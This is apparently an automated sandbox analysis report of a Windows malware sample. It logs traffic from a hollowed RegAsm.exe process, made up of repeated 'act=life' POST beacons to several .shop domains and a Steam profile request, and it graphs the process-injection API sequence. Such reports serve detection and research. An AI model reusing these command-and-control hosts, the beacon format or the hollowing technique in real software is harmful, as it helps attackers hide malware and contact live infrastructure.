    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BXm9y8%2FEhplIShUJVJsfKR9fxEh6IEEyaMpdvV2AY7wES7GiBSTRdx3fJugHZLoojMaJwoUl0tvFfl3wiAlvWJWlDVLtY3bT5E%2BKhgmJ%2FKuyNZSvvf3zBWsW4lF9xYgNu4bkOeFA"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8c91ac425dc09e05-EWR
2024-09-26 07:52:09 UTC | 15 | IN | Data Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a
    Data Ascii: aerror #D12
2024-09-26 07:52:09 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
    Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.4 | 58443 | 188.114.96.3 | 443 | 6596 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp | Bytes transferred | Direction | Data
2024-09-26 07:52:10 UTC | 263 | OUT | POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 8
    Host: vozmeatillu.shop
2024-09-26 07:52:10 UTC | 8 | OUT | Data Raw: 61 63 74 3d 6c 69 66 65
    Data Ascii: act=life
2024-09-26 07:52:10 UTC | 768 | IN | HTTP/1.1 200 OK
    Date: Thu, 26 Sep 2024 07:52:10 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: close
    Set-Cookie: PHPSESSID=nknlgn3nesvupmansaks93j5sn; expires=Mon, 20 Jan 2025 01:38:49 GMT; Max-Age=9999999; path=/
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate
    Pragma: no-cache
    CF-Cache-Status: DYNAMIC
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=SvDZxHj2fWVFvCxU9oJu9LYfzw9YhRZxB5eofr2MoKmRIKt187ZNZ2YFpygqUeU1sDBI%2Fh9eIgydT0k%2FF7t0hvLlh%2BJGKYtoFSPS2vRFe71aPGU36a4%2FGc9qwygPuoFkGNUr"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8c91ac47ffc4425b-EWR
2024-09-26 07:52:10 UTC | 15 | IN | Data Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a
    Data Ascii: aerror #D12
2024-09-26 07:52:10 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
    Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.4 | 58444 | 104.21.58.182 | 443 | 6596 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp | Bytes transferred | Direction | Data
2024-09-26 07:52:11 UTC | 263 | OUT | POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 8
    Host: drawzhotdog.shop
2024-09-26 07:52:11 UTC | 8 | OUT | Data Raw: 61 63 74 3d 6c 69 66 65
    Data Ascii: act=life
2024-09-26 07:52:11 UTC | 766 | IN | HTTP/1.1 200 OK
    Date: Thu, 26 Sep 2024 07:52:11 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: close
    Set-Cookie: PHPSESSID=s77kp8v757euoqstdvob4djm2d; expires=Mon, 20 Jan 2025 01:38:50 GMT; Max-Age=9999999; path=/
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate
    Pragma: no-cache
    CF-Cache-Status: DYNAMIC
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1DT5xm03vqTgBG8IP6RZPJQkR3%2BcrEIMiSsZfZoI0U87oKhWR3blvWrIhKOkG9DV3hslPHG8xHhSw99zr0jd2cccC0o1pM3vn7JdY4xiJnJJ%2BrHlsGYhTVj8pJv%2B9rWVoJgQ"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8c91ac4dbb397298-EWR
2024-09-26 07:52:11 UTC | 15 | IN | Data Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a
    Data Ascii: aerror #D12
2024-09-26 07:52:11 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
    Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.4 | 58445 | 188.114.97.3 | 443 | 6596 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp | Bytes transferred | Direction | Data
2024-09-26 07:52:12 UTC | 263 | OUT | POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 8
    Host: fragnantbui.shop
2024-09-26 07:52:12 UTC | 8 | OUT | Data Raw: 61 63 74 3d 6c 69 66 65
    Data Ascii: act=life
2024-09-26 07:52:12 UTC | 762 | IN | HTTP/1.1 200 OK
    Date: Thu, 26 Sep 2024 07:52:12 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: close
    Set-Cookie: PHPSESSID=0d77jnfq5a9dj0dg0r690q6r9t; expires=Mon, 20 Jan 2025 01:38:51 GMT; Max-Age=9999999; path=/
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate
    Pragma: no-cache
    CF-Cache-Status: DYNAMIC
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wLEPumwRovNQWbKM4COb8MWtydsvrSlKuxJDyu99nC4BRUTJsFAHUSms860V430fJdIIrTqNL7I21dVjN157rhCxxVYZhiuibeBt8FScDER3IXJNBBY%2BhncqHBSofiBjn5eu"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8c91ac53ef0f7298-EWR
2024-09-26 07:52:12 UTC | 15 | IN | Data Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a
    Data Ascii: aerror #D12
2024-09-26 07:52:12 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
    Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.4 | 58446 | 188.114.96.3 | 443 | 6596 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp | Bytes transferred | Direction | Data
2024-09-26 07:52:12 UTC | 265 | OUT | POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 8
    Host: stogeneratmns.shop
2024-09-26 07:52:12 UTC | 8 | OUT | Data Raw: 61 63 74 3d 6c 69 66 65
    Data Ascii: act=life
2024-09-26 07:52:13 UTC | 772 | IN | HTTP/1.1 200 OK
    Date: Thu, 26 Sep 2024 07:52:13 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: close
    Set-Cookie: PHPSESSID=pe4oeqgb4vsuqa9cm9oj1cqou7; expires=Mon, 20 Jan 2025 01:38:52 GMT; Max-Age=9999999; path=/
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate
    Pragma: no-cache
    CF-Cache-Status: DYNAMIC
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=A1PI7XtJAmvG4eTv6vuHa4IGAShYpniZKh0whYXUjoXvmcyaLKqN5fTcJMH00pPDXVqkCPc5ny8J4dqxS7GaVK2XdYM1sdw%2BU2Gy9GQ3kr43MO30YOIwnEM%2B2%2FPd4isUVlCVOPk%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8c91ac59cf150c90-EWR
2024-09-26 07:52:13 UTC | 15 | IN | Data Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a
    Data Ascii: aerror #D12
2024-09-26 07:52:13 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
    Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.2.4 | 58447 | 104.21.77.130 | 443 | 6596 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp | Bytes transferred | Direction | Data
2024-09-26 07:52:13 UTC | 263 | OUT | POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 8
    Host: reinforcenh.shop
2024-09-26 07:52:13 UTC | 8 | OUT | Data Raw: 61 63 74 3d 6c 69 66 65
    Data Ascii: act=life
2024-09-26 07:52:14 UTC | 764 | IN | HTTP/1.1 200 OK
    Date: Thu, 26 Sep 2024 07:52:14 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: close
    Set-Cookie: PHPSESSID=bvfk96460fne8r39j53ib8h45s; expires=Mon, 20 Jan 2025 01:38:53 GMT; Max-Age=9999999; path=/
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate
    Pragma: no-cache
    CF-Cache-Status: DYNAMIC
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ZtroZL2K6tdfzrxLxri8e4t8DSWWkZ1GpPlfNjmzWAzsClroHUPxkEzPp%2B9LarjYCKTJNSmvwe42wCVw4VjIljmUosgFEHzTMUEFky1S4KvhxEI3F272uUhATol%2BmHlRutmj"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8c91ac5f9821185d-EWR
2024-09-26 07:52:14 UTC | 15 | IN | Data Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a
    Data Ascii: aerror #D12
2024-09-26 07:52:14 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
    Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
8 | 192.168.2.4 | 58448 | 104.102.49.254 | 443 | 6596 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp | Bytes transferred | Direction | Data
2024-09-26 07:52:15 UTC | 219 | OUT | GET /profiles/76561199724331900 HTTP/1.1
    Connection: Keep-Alive
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Host: steamcommunity.com
2024-09-26 07:52:15 UTC | 1870 | IN | HTTP/1.1 200 OK
    Server: nginx
    Content-Type: text/html; charset=UTF-8
    Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.akamai.steamstatic.com/ https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.akamai.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq. [TRUNCATED]
    Expires: Mon, 26 Jul 1997 05:00:00 GMT
    Cache-Control: no-cache
    Date: Thu, 26 Sep 2024 07:52:15 GMT
    Content-Length: 34668
    Connection: close
    Set-Cookie: sessionid=0263ac58a4fa705dceec142c; Path=/; Secure; SameSite=None
    Set-Cookie: steamCountry=US%7Cd7fb65801182a5f50a3169fe2a0b7ef0; Path=/; Secure; HttpOnly; SameSite=None
2024-09-26 07:52:15 UTC | 14514 | IN | Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0d 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e 0d 0a 09 09 3c
    Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><
2024-09-26 07:52:15 UTC | 16384 | IN | Data Raw: 73 75 70 65 72 6e 61 76 5f 63 6f 6e 74 65 6e 74 27 2c 20 27 6f 66 66 73 65 74 59 27 3a 2d 36 2c 20 27 6f 66 66 73 65 74 58 27 3a 20 31 2c 20 27 68 6f 72 69 7a 6f 6e 74 61 6c 53 6e 61 70 27 3a 20 34 2c 20 27 74 6f 6f 6c 74 69 70 50 61 72 65 6e 74 27 3a 20 27 23 67 6c 6f 62 61 6c 5f 68 65 61 64 65 72 20 2e 73 75 70 65 72 6e 61 76 5f 63 6f 6e 74 61 69 6e 65 72 27 2c 20 27 63 6f 72 72 65 63 74 46 6f 72 53 63 72 65 65 6e 53 69 7a 65 27 3a 20 66 61 6c 73 65 7d 29 3b 0d 0a 09 09 7d 29 3b 0d 0a 09 3c 2f 73 63 72 69 70 74 3e 0d 0a 0d 0a 09 09 3c 64 69 76 20 69 64 3d 22 67 6c 6f 62 61 6c 5f 61 63 74 69 6f 6e 73 22 3e 0d 0a 09 09 09 3c 64 69 76 20 72 6f 6c 65 3d 22 6e 61 76 69 67 61 74 69 6f 6e 22 20 69 64 3d 22 67 6c 6f 62 61 6c 5f 61 63 74 69 6f 6e 5f 6d 65 6e 75
    Data Ascii: supernav_content', 'offsetY':-6, 'offsetX': 1, 'horizontalSnap': 4, 'tooltipParent': '#global_header .supernav_container', 'correctForScreenSize': false});});</script><div id="global_actions"><div role="navigation" id="global_action_menu
2024-09-26 07:52:15 UTC | 3768 | IN | Data Raw: 77 20 6d 6f 72 65 20 69 6e 66 6f 3c 2f 73 70 61 6e 3e 0d 0a 09 09 09 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 09 09 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 20 24 4a 28 20 66 75 6e 63 74 69 6f 6e 28 29 20 7b 20 49 6e 69 74 50 72 6f 66 69 6c 65 53 75 6d 6d 61 72 79 28 20 67 5f 72 67 50 72 6f 66 69 6c 65 44 61 74 61 5b 27 73 75 6d 6d 61 72 79 27 5d 20 29 3b 20 7d 20 29 3b 20 3c 2f 73 63 72 69 70 74 3e 0d 0a 09 09 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0d 0a 0d 0a 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 3c 2f 64 69 76 3e 0d 0a 09 3c 2f 64 69 76 3e 0d 0a 3c 2f 64 69 76 3e 0d 0a 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 72 6f 66 69 6c 65 5f 63 6f 6e 74 65 6e 74 20 22 3e 0d 0a 09 09 3c 64 69 76 20 63 6c 61
    Data Ascii: w more info</span></div><script type="text/javascript"> $J( function() { InitProfileSummary( g_rgProfileData['summary'] ); } ); </script></div></div></div></div></div><div class="profile_content "><div cla
2024-09-26 07:52:15 UTC | 2 | IN | Data Raw: 6c 3e
    Data Ascii: l>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                9192.168.2.458449172.67.189.24436596C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Timestamp                  Bytes transferred   Direction   Data
2024-09-26 07:52:16 UTC    262                 OUT         POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 8
Host: performenj.shop
2024-09-26 07:52:16 UTC    8                   OUT         Data Raw: 61 63 74 3d 6c 69 66 65
Data Ascii: act=life
2024-09-26 07:52:16 UTC    776                 IN          HTTP/1.1 200 OK
Date: Thu, 26 Sep 2024 07:52:16 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=s1o1p84cec2umj92akvp44qvsm; expires=Mon, 20 Jan 2025 01:38:55 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xHV80Ur5%2F6xoPbSI39%2FPQvopV8XarwfA3KCPTN55fLbX6%2FE9lEl9G66wMuWppRrhA9gEn8x1FTBqTvaTcqAZgamGjz5N0hOR474f%2F3Kq52Cfo%2BzmKsm2lJZbaG%2B%2FNaNghXo%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8c91ac6f0b2f0f4b-EWR
2024-09-26 07:52:16 UTC    15                  IN          Data Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a
Data Ascii: aerror #D12
2024-09-26 07:52:16 UTC    5                   IN          Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0



                                                                Target ID:0
                                                                Start time:03:52:04
                                                                Start date:26/09/2024
                                                                Path:C:\Users\user\Desktop\a7HdB2dU5P.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:"C:\Users\user\Desktop\a7HdB2dU5P.exe"
                                                                Imagebase:0x5d0000
                                                                File size:374'784 bytes
                                                                MD5 hash:EC5818DECCA5D6703E23C9DB8A772997
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:low
                                                                Has exited:true

                                                                Target ID:1
                                                                Start time:03:52:04
                                                                Start date:26/09/2024
                                                                Path:C:\Windows\System32\conhost.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                Imagebase:0x7ff7699e0000
                                                                File size:862'208 bytes
                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:true

                                                                Target ID:2
                                                                Start time:03:52:06
                                                                Start date:26/09/2024
                                                                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                                Imagebase:0xc40000
                                                                File size:65'440 bytes
                                                                MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:true


                                                                  Execution Graph

                                                                  Execution Coverage:44.4%
                                                                  Dynamic/Decrypted Code Coverage:100%
                                                                  Signature Coverage:15.4%
                                                                  Total number of Nodes:39
                                                                  Total number of Limit Nodes:0
                                                                  execution_graph 554 28c2145 555 28c217d CreateProcessA VirtualAlloc Wow64GetThreadContext ReadProcessMemory VirtualAllocEx 554->555 557 28c235a WriteProcessMemory 555->557 558 28c239f 557->558 559 28c23a4 WriteProcessMemory 558->559 560 28c23e1 WriteProcessMemory Wow64SetThreadContext ResumeThread 558->560 559->558 561 c60988 562 c609aa 561->562 571 c6053c 562->571 565 c60ad6 569 c6053c VirtualProtectEx 569->565 572 c61100 571->572 573 c612ce VirtualProtectEx 572->573 574 c60aa0 573->574 574->565 574->569 575 c61268 574->575 579 c6121c 574->579 583 c61270 574->583 587 c610f4 574->587 576 c61230 575->576 576->575 577 c612ce VirtualProtectEx 576->577 578 c612ff 577->578 578->565 580 c6122a 579->580 581 c612ce VirtualProtectEx 580->581 582 c612ff 581->582 582->565 584 c612bb VirtualProtectEx 583->584 586 c612ff 584->586 586->565 588 c61155 587->588 589 c612ce VirtualProtectEx 588->589 590 c612ff 589->590 590->565 601 c60979 602 c609aa 601->602 603 c6053c VirtualProtectEx 602->603 604 c60aa0 603->604 605 c60ad6 604->605 606 c610f4 VirtualProtectEx 604->606 607 c61270 VirtualProtectEx 604->607 608 c6121c VirtualProtectEx 604->608 609 c6053c VirtualProtectEx 604->609 610 c61268 VirtualProtectEx 604->610 606->605 607->605 608->605 609->605 610->605

                                                                  Callgraph

                                                                  • Executed
                                                                  • Not Executed
                                                                  • Opacity -> Relevance
                                                                  • Disassembly available
                                                                  callgraph 0 Function_00C60244 1 Function_00C60444 2 Function_00C604C5 3 Function_00C60B40 4 Function_00C601C0 5 Function_00C604C1 6 Function_00C6004D 7 Function_00C60148 8 Function_00C600C8 9 Function_00C60548 10 Function_00C60848 11 Function_00C60BC8 12 Function_00C604C9 13 Function_00C60A57 13->3 13->9 23 Function_00C60C58 13->23 36 Function_00C61268 13->36 38 Function_00C610F4 13->38 40 Function_00C61270 13->40 66 Function_00C6121C 13->66 78 Function_00C60530 13->78 79 Function_00C6053C 13->79 14 Function_00C60154 15 Function_00C600D4 16 Function_00C60254 17 Function_028C1F9E 18 Function_00C601D5 19 Function_00C60450 20 Function_00C604DF 21 Function_00C60F5F 33 Function_00C6026C 21->33 22 Function_00C6045D 24 Function_00C608D8 25 Function_00C600E4 26 Function_00C60165 27 Function_00C601E5 28 Function_00C60465 29 Function_00C60060 30 Function_00C60260 31 Function_00C60461 32 Function_028C1D2B 34 Function_00C6046D 35 Function_00C608E8 36->33 37 Function_00C60469 38->33 39 Function_00C60475 41 Function_00C60070 42 Function_00C600F0 43 Function_00C60471 44 Function_00C6027C 45 Function_00C6047D 46 Function_00C604FD 47 Function_00C60178 48 Function_00C601F8 49 Function_00C60479 50 Function_00C604F9 51 Function_00C60979 51->3 51->9 51->23 51->36 51->38 51->40 51->66 70 Function_00C60524 51->70 51->78 51->79 52 Function_00C60100 53 Function_00C60080 54 Function_00C60501 55 Function_028C2145 56 Function_00C6010C 57 Function_00C60988 57->3 57->9 57->23 57->36 57->38 57->40 57->66 57->70 57->78 57->79 58 Function_00C60188 59 Function_00C60208 60 Function_00C61216 61 Function_00C60214 62 Function_00C60015 63 Function_00C60090 64 Function_00C60B10 64->3 65 Function_00C6011C 66->33 67 Function_00C60198 68 Function_00C60498 69 Function_00C610A6 71 Function_00C600A0 72 Function_00C6012C 73 Function_00C610AC 73->33 74 Function_00C601A8 75 Function_00C601B4 76 Function_00C60234 77 Function_00C600B0 78->33 79->33 
80 Function_00C600BC 81 Function_00C6013C

                                                                  Control-flow Graph

                                                                  APIs
                                                                  • CreateProcessA.KERNELBASE(C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,00000000,00000000,00000000,00000000,00000004,00000000,00000000,028C20B7,028C20A7), ref: 028C22B4
                                                                  • VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 028C22C7
                                                                  • Wow64GetThreadContext.KERNEL32(00000300,00000000), ref: 028C22E5
                                                                  • ReadProcessMemory.KERNELBASE(00000304,?,028C20FB,00000004,00000000), ref: 028C2309
                                                                  • VirtualAllocEx.KERNELBASE(00000304,?,?,00003000,00000040), ref: 028C2334
                                                                  • WriteProcessMemory.KERNELBASE(00000304,00000000,?,?,00000000,?), ref: 028C238C
                                                                  • WriteProcessMemory.KERNELBASE(00000304,00400000,?,?,00000000,?,00000028), ref: 028C23D7
                                                                  • WriteProcessMemory.KERNELBASE(00000304,?,?,00000004,00000000), ref: 028C2415
                                                                  • Wow64SetThreadContext.KERNEL32(00000300,00D10000), ref: 028C2451
                                                                  • ResumeThread.KERNELBASE(00000300), ref: 028C2460
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1693434535.00000000028C1000.00000040.00000800.00020000.00000000.sdmp, Offset: 028C1000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_28c1000_a7HdB2dU5P.jbxd
                                                                  Similarity
                                                                  • API ID: Process$Memory$ThreadWrite$AllocContextVirtualWow64$CreateReadResume
                                                                  • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$CreateProcessA$GetP$GetThreadContext$Load$ReadProcessMemory$ResumeThread$SetThreadContext$TerminateProcess$VirtualAlloc$VirtualAllocEx$WriteProcessMemory$aryA$ress
                                                                  • API String ID: 2687962208-1257834847
                                                                  • Opcode ID: 5830fdbf51cd66032c811c655c8f92b1c7674356d546a8de58cf9f8e9e68e0da
                                                                  • Instruction ID: 9683214e330df2a6ffebdbb801ab531dfddb76b4ab142f6fc772df1cb022c18c
                                                                  • Opcode Fuzzy Hash: 5830fdbf51cd66032c811c655c8f92b1c7674356d546a8de58cf9f8e9e68e0da
                                                                  • Instruction Fuzzy Hash: 99B1E47664028AAFDB60CF68CC80BDA77A5FF88714F158124EA0CEB355D774FA418B94

                                                                  Control-flow Graph

                                                                  control_flow_graph 23 c61268-c6126d 24 c61230-c61238 call c6026c 23->24 25 c6126f-c612c7 23->25 24->23 29 c612ce-c612fd VirtualProtectEx 25->29 30 c61304-c61325 29->30 31 c612ff 29->31 31->30
                                                                  APIs
                                                                  • VirtualProtectEx.KERNELBASE(?,?,?,?,?), ref: 00C612F0
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1692731646.0000000000C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C60000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_c60000_a7HdB2dU5P.jbxd
                                                                  Similarity
                                                                  • API ID: ProtectVirtual
                                                                  • String ID:
                                                                  • API String ID: 544645111-0
                                                                  • Opcode ID: ece1d6da22a1c81dbb2f75ad306e1022c489839994ee1129b56cc6887dcd14cf
                                                                  • Instruction ID: aa6109c6aa069af5da9d2bb390a3127b7aa87c2e53c4565edd3727e30347c800
                                                                  • Opcode Fuzzy Hash: ece1d6da22a1c81dbb2f75ad306e1022c489839994ee1129b56cc6887dcd14cf
                                                                  • Instruction Fuzzy Hash: F42114B59002599FCB10DFA9D884AEEBBF0FF48310F24842EE959A7260C7745944CFA5

                                                                  Control-flow Graph

                                                                  control_flow_graph 34 c61270-c612fd VirtualProtectEx 37 c61304-c61325 34->37 38 c612ff 34->38 38->37
                                                                  APIs
                                                                  • VirtualProtectEx.KERNELBASE(?,?,?,?,?), ref: 00C612F0
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1692731646.0000000000C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C60000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_c60000_a7HdB2dU5P.jbxd
                                                                  Similarity
                                                                  • API ID: ProtectVirtual
                                                                  • String ID:
                                                                  • API String ID: 544645111-0
                                                                  • Opcode ID: 97ea83a094f3d711d53e1ef8fa595ea30a7f7fdc7e63060786c0e2a1c54a79aa
                                                                  • Instruction ID: 17f5c75858614ea5350117a4efda1632a113ce880281caf9f08f2c8e8d803be1
                                                                  • Opcode Fuzzy Hash: 97ea83a094f3d711d53e1ef8fa595ea30a7f7fdc7e63060786c0e2a1c54a79aa
                                                                  • Instruction Fuzzy Hash: A22122B1900259DFCB10DFAAC880ADEFBF4FF48310F10842AE959A7250C774A944CFA5

                                                                  Execution Graph

